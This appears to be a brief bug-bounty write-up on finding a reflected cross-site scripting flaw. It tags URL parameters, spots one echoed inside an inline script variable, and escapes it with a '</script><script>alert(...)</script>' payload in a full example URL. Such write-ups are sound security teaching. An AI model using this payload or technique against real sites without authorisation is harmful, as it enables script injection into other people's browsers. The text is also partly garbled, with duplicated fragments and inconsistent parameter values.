How i got Cross-site Scripting (XSS)Reflected Using an unknown technique

4 months ago 32

BOOK THIS SPACE FOR AD

ARTICLE AD

Let’s explain how I found Cross-site Scripting (XSS) Reflected vulnerabilities

1After finding the parameter values are reflected in the response
You will find it here

https://ex.target.com/sitemap/?tab=mekky1&domain=mekky2&show=mekky3&submit=mekky4&move=mekky5&userid=mekky6&oitar=&key=mekky7&description=mekky8&user=mekky9&active=></script><script>alert("0xmekky_xss")</script>&success=mekky14&slug=mekky11

As you can see, I distinguish each parameter with a distinct word in order to know and confirm which one will work, which is reflected in the source code.

As you can see, there is only one parameter that may be reflected in var topmenu and var mainmenu<script type="text/javascript">
topmenu = "mekky10";
</script>

I have added both ><()””</>
They are all placed as is, there is no block or filter

inject Basic JavaScript payload

As you can see not working

You also notice that here he understood that </script> That it follows <script type=”text/javascript”> var mainmenu = “mekky10><script>alert(1)</script>”;<script type="text/javascript">
var mainmenu = "mekky10><script>alert(1)</script>";
</script>

Ok, I tried adding my payload after </script>

</script><script>alert("0xmekky_xss")</script>&success=mekky14&slug=mekky15

As you can see, it should be working properly

booooooooooom

Read Entire Article